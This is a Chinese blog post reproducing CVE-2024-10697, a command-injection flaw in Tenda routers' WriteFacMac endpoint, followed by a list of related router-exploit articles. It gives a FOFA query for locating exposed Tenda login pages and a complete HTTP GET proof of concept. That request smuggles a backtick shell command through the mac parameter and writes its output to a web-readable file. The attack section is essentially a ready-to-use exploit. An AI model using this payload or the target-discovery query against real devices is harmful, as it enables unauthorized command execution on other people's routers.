tenda路由器WriteFacMac存在远程命令执行漏洞(CVE-2024-10697)

最新推荐文章于 2025-02-20 11:56:36 发布
最新推荐文章于 2025-02-20 11:56:36 发布
阅读量719 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/user_hs/article/details/145599296

一、漏洞简介

tenda路由器WriteFacMac存在远程命令执行漏洞

二、漏洞影响

tenda路由器

三、网络测绘:

fofa:
title="Tenda | LOGIN"

在这里插入图片描述

四、复现过程

POC 1

GET /goform/WriteFacMac?mac=`ls%20%3E/webroot/1.txt` HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0

访问
url/1.txt

Tenda 路由器 uploadWewifiPic后台RCE漏洞复现
0xSec
12-04 1165
腾达路由器后台 uploadWewifiPic 路由存在命令执行漏洞,攻击者可利用漏洞执行任意命令获取服务器权限。
【工业安全-CVE-2024-30891- Tenda AC18路由器 命令注入漏洞
weixin_65311462的博客
02-14 1175
1.漏洞描述2.漏洞复现2.1 qemu-user 模拟:2.2 qemu-system模拟:3.漏洞分析。
固件中的单个二进制模拟:Tenda AC15 路由器 CVE-2018-5767 / CVE-2020-10987 漏洞分析与复现
个人笔记
02-26 5400
对于传统路由器,单个二进制依赖程度不高,往往能够独立运行,在这种情况下,我们是有可能直接使用 `qemu` 将一些核心业务拉起来。本文就是利用这种方法,搭建了漏洞复现环境。在分析漏洞时,结合代码类比技术,利用开源代码,对二进制进行修复,这样能够让我们更加清楚整个漏洞形成的原因。
tenda路由器漏洞利用工具
01-20
tenda路由器cookie漏洞利用工具 by supppig
Tenda路由器账号密码信息泄露漏洞
m0_46381222的博客
10-28 909
Tenda路由器账号密码信息泄露漏洞
【从零复现CVE漏洞Tenda 路由器栈溢出复现(CVE-2018-18708)
m0_55368674的博客
02-09 5487
Tenda 路由器栈溢出复现(CVE-2018-18708)
Tenda路由cookie漏洞利用工具
11-08
Tenda路由cookie漏洞利用工具
【工业安全-CVE-2020-10987- Tenda AC9路由器 远程代码执行漏洞
weixin_65311462的博客
02-14 1365
目录:1.漏洞描述2.环境搭建3.漏洞复现4.漏洞分析4.1:代码分析4.2:流量分析。
【工业安全-CVE-2022-40876- Tenda AX1803路由器 栈溢出漏洞
weixin_65311462的博客
02-13 945
文章目录1.漏洞描述2.环境搭建3.漏洞复现4.漏洞分析4.1:代码分析4.2:流量分析。
【工业安全-CVE-2022-35555- Tenda W6路由器 命令注入漏洞
weixin_65311462的博客
02-12 1607
文章目录1.漏洞描述2.环境搭建3.漏洞复现4.漏洞分析4.1:代码分析4.2:流量分析。
腾达路由cookie漏洞利用工具
10-30
基于Tenda路由器漏洞利用 当连接到内网时 可以直接打开工具注入cookie 更改路由器管理员密码
Tenda路由器 信息泄露漏洞复现
12-11 1115
Tenda是一家专门提供网络设备和解决方案的公司,其中最知名的产品之一是路由器Tenda路由器在家庭和小型办公室中非常受欢迎,因为它们提供了稳定的无线网络连接和易于设置的功能。
【复现】Tenda信息泄露漏洞_19
fushuang333的博客
01-15 2542
【复现】Tenda信息泄露漏洞Tenda远端WEB管理是为了在外网(其他网络)可以访问路由器,从而进行管理。
腾达路由器linux开发,Tenda无线路由器远程命令执行后门漏洞
weixin_42376940的博客
05-12 545
发布日期:2013-10-15更新日期:2013-10-19受影响系统:tenda W302Rtenda W330R描述:--------------------------------------------------------------------------------Tenda是深圳的一家网络设备提供商。Tenda的 W330R、W302R无线路由器固件最新版本及Medialink ...
漏洞复现-Tenda 路由器
zkaqlaoniao的博客
12-05 690
Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器Tenda 路由器存在信息泄露漏洞,攻击者通过构造特殊 URL 地址,读取系统敏感信息网访问该系统。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。4、从配置中查找账户密码(直接打开JPG就行了)免费领取安全学习资料包!帮助你在面试中脱颖而出。
Sapido路由器命令执行漏洞
chaojixiaojingang
04-19 1516
1.漏洞描述 Sapido路由器存在命令执行漏洞,攻击者可通过未授权进入命令执行页面,进而可以root权限执行任意命令。 2.影响版本 BR270n-v2.1.03 BRC76n-v2.1.03 GR297-v2.1.3 RB1732-v2.0.43 3.网络资产查找 Fofa:app="Sapido-路由器" 4.POC http://xxx.xxx.xxx.xxx/syscmd.asp http://xxx.xxx.xxx.xxx/syscmd.htm 5.漏洞复现 ...
TENDA 11N无线路由器Index存在越权访问漏洞
缘梦未来的博客
12-26 235
TENDA腾达)11N无线路由器是一款支持802.11n无线标准的路由器,主要面向家庭和小型办公用户。它以高性价比、易用性和稳定性著称,适用于构建小型的无线局域网(WLAN)。
路由器通用0day漏洞挖掘及RCE思路_0dayrce
最新发布
小司机的奥拓
02-20 1045
近期tenda系列路由器频繁出现漏洞,下面以CVE-2023-27021漏洞为例,简要描述下对于刚入门IOT安全的人来说怎样去挖掘一个路由器的栈溢出漏洞,并深入利用实现RCE通常我们挖掘固件漏洞,首先要拿到固件,腾达官网提供用于更新的固件包,我们去官网下载固件即可。最可能容易发现漏洞的固件,可能是某些上一个更新版本比较早的固件,我们可以着重针对这些固件进行漏洞挖掘。AC15升级软件_下载中心_腾达(Tenda)官方网站网络安全产业就像一个江湖,各色人等聚集。
CVE-2023-3450 锐捷Ruijie路由器命令执行漏洞复现
08-07 3820
RG-BCR860是锐捷网络推出的一款商业云路由器,它是专为酒店、餐饮、门店设计,适用带宽100Mbps,带机量可达150台,支持Sec VPM、内置安全审计模块,给商家带来更好的网络营销体验。该产品主支持全中文的WEB 界面配置,不再需要用传统的命令行进行配置,使得设备更加简单方便的进行维护和管理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值